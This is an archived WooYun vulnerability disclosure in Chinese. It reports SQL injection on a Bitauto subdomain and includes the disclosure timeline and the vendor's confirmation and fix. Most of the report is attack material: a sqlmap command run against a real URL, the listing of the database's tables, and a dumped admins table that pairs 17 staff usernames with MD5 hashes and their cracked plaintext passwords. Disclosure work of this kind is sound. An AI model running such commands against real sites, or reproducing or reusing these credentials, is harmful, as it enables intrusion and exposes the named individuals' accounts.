乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-07: 细节已通知厂商并且等待厂商处理中 2014-10-08: 厂商已经确认,细节仅向厂商公开 2014-10-18: 细节向核心白帽子及相关领域专家公开 2014-10-28: 细节向普通白帽子公开 2014-11-07: 细节向实习白帽子公开 2014-11-21: 细节向公众公开
易车网某分站SQL注入
sqlmap.py -u http://hd.bitauto.com/activity/?id=45 -p id --threads=10 --level=5 --risk=3 --text-only --dbs
available databases [3]:[*] hd_huodong[*] information_schema[*] test
Database: hd_huodong+----------------------+---------+| Table | Entries |+----------------------+---------+| ippool | 345661 || activity_dealer | 5827 || statistics | 4575 || activity_signup | 2368 || region | 2109 || admins_login_log | 1196 || activity_area | 1031 || activity_content | 82 || activity_intention | 67 || admins_purview | 51 || activity_brand | 39 || activity | 33 || admins | 17 || activity_focus | 9 || activity_auto_detail | 7 || weixin_user | 7 || admins_group | 5 || dealer_activity | 4 || media | 3 || system | 3 || resource_class | 2 || dealer_user | 1 || resource | 1 || resource_type | 1 |+----------------------+---------+
Database: hd_huodongTable: admins[17 entries]+----+----------+---------------+---------------+--------------------------------------------+| id | group_id | name | email | password |+----+----------+---------------+---------------+--------------------------------------------+| 1 | 1 | sunwx | <blank> | 99dda85ff55b9748b0cecce57e6eeb7e (20140806)|| 30 | 1 | star | [email protected] | 96e79218965eb72c92a549dd5a330112 (111111) || 31 | 10 | songjh | \x02 | c4ca4238a0b923820dcc509a6f75849b (1) || 32 | 1 | yuanjingshuai | <blank> | c4ca4238a0b923820dcc509a6f75849b (1) || 33 | 1 | liuqi | <blank> | c4ca4238a0b923820dcc509a6f75849b (1) || 34 | 1 | yanxf | <blank> | c4ca4238a0b923820dcc509a6f75849b (1) || 35 | 10 | sunlx | <blank> | 6512bd43d9caa6e02c990b0a82652dca (11) || 36 | 9 | chenxingsheng | <blank> | c4ca4238a0b923820dcc509a6f75849b (1) || 37 | 10 | zhudd | <blank> | c4ca4238a0b923820dcc509a6f75849b (1) || 38 | 10 | wubin | <blank> | c4ca4238a0b923820dcc509a6f75849b (1) || 39 | 9 | liuxiaoli | <blank> | c4ca4238a0b923820dcc509a6f75849b (1) || 40 | 8 | menghw | <blank> | c4ca4238a0b923820dcc509a6f75849b (1) || 41 | 10 | wudi | <blank> | e10adc3949ba59abbe56e057f20f883e (123456) || 42 | 1 | zhujs | <blank> | c4ca4238a0b923820dcc509a6f75849b (1) || 43 | 10 | wangyajing | <blank> | c4ca4238a0b923820dcc509a6f75849b (1) || 44 | 10 | wangyajing | <blank> | b59c67bf196a4758191e42f76670ceba (1111) || 45 | 1 | wangli5 | <blank> | c4ca4238a0b923820dcc509a6f75849b (1) |+----+----------+---------------+---------------+--------------------------------------------+
如上
过滤
危害等级:中
漏洞Rank:10
确认时间:2014-10-08 09:41
非常感谢提供的漏洞,我们会及时处理
2014-10-08:非常感谢,漏洞我们已经修复完成